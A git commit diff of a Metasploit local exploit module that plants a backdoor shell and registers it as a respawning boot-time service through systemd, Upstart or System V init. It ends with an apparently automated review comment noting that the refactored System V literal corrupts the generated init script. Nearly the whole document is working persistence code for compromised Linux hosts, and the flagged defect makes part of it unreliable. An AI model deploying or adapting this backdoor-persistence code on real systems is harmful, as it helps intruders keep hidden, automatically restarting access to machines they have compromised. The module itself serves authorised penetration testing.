updates round 2
This commit is contained in:
parent
1c20122648
commit
03dca5fee2
|
@ -3,9 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/file'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
|
@ -47,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Targets' =>
|
||||
[
|
||||
['Auto', {}],
|
||||
['System V', { 'runlevel' => '2 3 4 5' }],
|
||||
['Upstart', { 'runlevel' => '2345' }],
|
||||
['System V', { :runlevel => '2 3 4 5' }],
|
||||
['Upstart', { :runlevel => '2345' }],
|
||||
['systemd', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -84,13 +81,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def exploit
|
||||
backdoor = write_shell(datastore['SHELLPATH'])
|
||||
path = backdoor.split(File::SEPARATOR)[0...-1].join('/')
|
||||
file = backdoor.split(File::SEPARATOR)[-1]
|
||||
path = backdoor.split('/')[0...-1].join('/')
|
||||
file = backdoor.split('/')[-1]
|
||||
case target.name
|
||||
when 'System V'
|
||||
system_v(path, file, target.opts['runlevel'], service_system_exists?('update-rc.d'))
|
||||
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
|
||||
when 'Upstart'
|
||||
upstart(path, file, target.opts['runlevel'])
|
||||
upstart(path, file, target.opts[:runlevel])
|
||||
when 'systemd'
|
||||
systemd(path, file)
|
||||
else
|
||||
|
@ -129,17 +126,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def systemd(backdoor_path, backdoor_file)
|
||||
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
|
||||
script = "[Unit]\n"
|
||||
script << "Description=Start daemon at boot time\n"
|
||||
script << "After=\n"
|
||||
script << "Requires=\n"
|
||||
script << "[Service]\n"
|
||||
script << "RestartSec=10s\n"
|
||||
script << "Restart=always\n"
|
||||
script << "TimeoutStartSec=5\n"
|
||||
script << "ExecStart=/bin/sh #{backdoor_path}#{File::SEPARATOR}#{backdoor_file}\n"
|
||||
script << "[Install]\n"
|
||||
script << "WantedBy=multi-user.target\n"
|
||||
script = %{[Unit]
|
||||
Description=Start daemon at boot time
|
||||
After=
|
||||
Requires=
|
||||
[Service]
|
||||
RestartSec=10s
|
||||
Restart=always
|
||||
TimeoutStartSec=5
|
||||
ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
|
||||
[Install]
|
||||
WantedBy=multi-user.target}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
|
||||
|
@ -152,17 +149,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def upstart(backdoor_path, backdoor_file, runlevel)
|
||||
# http://blog.terminal.com/getting-started-with-upstart/
|
||||
script = "description \"Start daemon at boot time\"\n"
|
||||
script << "start on filesystem or runlevel [#{runlevel}]\n"
|
||||
script << "stop on shutdown\n"
|
||||
script << "script\n"
|
||||
script << " cd #{backdoor_path}\n"
|
||||
script << " echo $$ > /var/run/#{backdoor_file}.pid\n"
|
||||
script << " exec #{backdoor_file}\n"
|
||||
script << "end script\n"
|
||||
script << "post-stop exec sleep 10\n"
|
||||
script << "respawn\n"
|
||||
script << "respawn limit unlimited\n"
|
||||
script = %{description \"Start daemon at boot time\"
|
||||
start on filesystem or runlevel [#{runlevel}]
|
||||
stop on shutdown
|
||||
script
|
||||
cd #{backdoor_path}
|
||||
echo $$ > /var/run/#{backdoor_file}.pid
|
||||
exec #{backdoor_file}
|
||||
end script
|
||||
post-stop exec sleep 10
|
||||
respawn
|
||||
respawn limit unlimited}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
|
||||
|
@ -178,95 +175,96 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
else
|
||||
print_status('Utilizing chkconfig')
|
||||
end
|
||||
script = "#!/bin/sh\n"
|
||||
script << "### BEGIN INIT INFO\n"
|
||||
script << "# Provides: service\n"
|
||||
script << "# Required-Start: $network\n"
|
||||
script << "# Required-Stop: $network\n"
|
||||
script << "# Default-Start: #{runlevel}\n"
|
||||
script << "# Default-Stop: 0 1 6\n"
|
||||
script << "# Short-Description: Start daemon at boot time\n"
|
||||
script << "# Description: Enable service provided by daemon.\n"
|
||||
script << "### END INIT INFO\n"
|
||||
script << "dir=\"#{backdoor_path}\"\n"
|
||||
script << "cmd=\"#{backdoor_file}\"\n"
|
||||
script << "name=`basename $0`\n"
|
||||
script << "pid_file=\"/var/run/$name.pid\"\n"
|
||||
script << "stdout_log=\"/var/log/$name.log\"\n"
|
||||
script << "stderr_log=\"/var/log/$name.err\"\n"
|
||||
script << "get_pid() {\n"
|
||||
script << " cat \"$pid_file\"\n"
|
||||
script << "}\n"
|
||||
script << "is_running() {\n"
|
||||
script << " [ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1\n"
|
||||
script << "}\n"
|
||||
script << "case \"$1\" in\n"
|
||||
script << " start)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Already started\"\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Starting $name\"\n"
|
||||
script << " cd \"$dir\"\n"
|
||||
script = %{#!/bin/sh
|
||||
### BEGIN INIT INFO
|
||||
# Provides: service
|
||||
# Required-Start: $network
|
||||
# Required-Stop: $network
|
||||
# Default-Start: #{runlevel}
|
||||
# Default-Stop: 0 1 6
|
||||
# Short-Description: Start daemon at boot time
|
||||
# Description: Enable service provided by daemon.
|
||||
### END INIT INFO
|
||||
dir=\"#{backdoor_path}\"
|
||||
cmd=\"#{backdoor_file}\"
|
||||
name=`basename $0`
|
||||
pid_file=\"/var/run/$name.pid\"
|
||||
stdout_log=\"/var/log/$name.log\"
|
||||
stderr_log=\"/var/log/$name.err\"
|
||||
get_pid() {
|
||||
cat \"$pid_file\"
|
||||
}
|
||||
is_running() {
|
||||
[ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1
|
||||
}
|
||||
case \"$1\" in
|
||||
start)
|
||||
if is_running; then
|
||||
echo \"Already started\"
|
||||
else
|
||||
echo \"Starting $name\"
|
||||
cd \"$dir\"}
|
||||
|
||||
if has_updatercd
|
||||
script << " sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
|
||||
else # CentOS didn't like sudo or su...
|
||||
script << " $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
|
||||
end
|
||||
script << " echo $! > \"$pid_file\"\n"
|
||||
script << " if ! is_running; then\n"
|
||||
script << " echo \"Unable to start, see $stdout_log and $stderr_log\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " stop)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo -n \"Stopping $name..\"\n"
|
||||
script << " kill `get_pid`\n"
|
||||
script << " for i in {1..10}\n"
|
||||
script << " do\n"
|
||||
script << " if ! is_running; then\n"
|
||||
script << " break\n"
|
||||
script << " fi\n"
|
||||
script << " echo -n \".\"\n"
|
||||
script << " sleep 1\n"
|
||||
script << " done\n"
|
||||
script << " echo\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Not stopped; may still be shutting down or shutdown may have failed\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Stopped\"\n"
|
||||
script << " if [ -f \"$pid_file\" ]; then\n"
|
||||
script << " rm \"$pid_file\"\n"
|
||||
script << " fi\n"
|
||||
script << " fi\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Not running\"\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " restart)\n"
|
||||
script << " $0 stop\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Unable to stop, will not attempt to start\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " $0 start\n"
|
||||
script << " ;;\n"
|
||||
script << " status)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Running\"\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Stopped\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " *)\n"
|
||||
script << " echo \"Usage: $0 {start|stop|restart|status}\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " ;;\n"
|
||||
script << "esac\n"
|
||||
script << "exit 0\n"
|
||||
script << %{ echo $! > \"$pid_file\"
|
||||
if ! is_running; then
|
||||
echo \"Unable to start, see $stdout_log and $stderr_log\"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
;;
|
||||
stop)
|
||||
if is_running; then
|
||||
echo -n \"Stopping $name..\"
|
||||
kill `get_pid`
|
||||
for i in {1..10}
|
||||
do
|
||||
if ! is_running; then
|
||||
break
|
||||
fi
|
||||
echo -n \".\"
|
||||
sleep 1
|
||||
done
|
||||
echo
|
||||
if is_running; then
|
||||
echo \"Not stopped; may still be shutting down or shutdown may have failed\"
|
||||
exit 1
|
||||
else
|
||||
echo \"Stopped\"
|
||||
if [ -f \"$pid_file\" ]; then
|
||||
rm \"$pid_file\"
|
||||
fi
|
||||
fi
|
||||
else
|
||||
echo \"Not running\"
|
||||
fi
|
||||
;;
|
||||
restart)
|
||||
$0 stop
|
||||
if is_running; then
|
||||
echo \"Unable to stop, will not attempt to start\"
|
||||
exit 1
|
||||
fi
|
||||
$0 start
|
||||
;;
|
||||
status)
|
||||
if is_running; then
|
||||
echo \"Running\"
|
||||
else
|
||||
echo \"Stopped\"
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo \"Usage: $0 {start|stop|restart|status}\"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
exit 0}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /etc/init.d/#{service_filename}")
|
||||
|
|
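Review bot: In the system_v hunk the new `%{...}` literal closes at `cd \"$dir\"}` with no trailing newline, whereas the replaced `<<` form ended that line with `\n`; the `script << "  sudo $cmd >> ..."` / `script << "  $cmd >> ..."` appends that follow therefore land on the same line as `cd "$dir"` in the generated init script, and the `echo $! > "$pid_file"` block appended afterwards no longer corresponds to a command run on its own line. Put the closing brace on its own line so the literal ends with a newline: `        cd \"$dir\"` then `}` as the next line (the `exit 0}`, `WantedBy=multi-user.target}` and `respawn limit unlimited}` endings only drop the file's final newline and are harmless). The `\"` escapes inside the `%{}` literals are valid but unnecessary, since only the braces delimit the string, so the literal could be written with plain `"` for readability. The `system_v` signature lies outside this hunk, so the `runlevel`, `backdoor_path` and `backdoor_file` parameters are assumed from the interpolations.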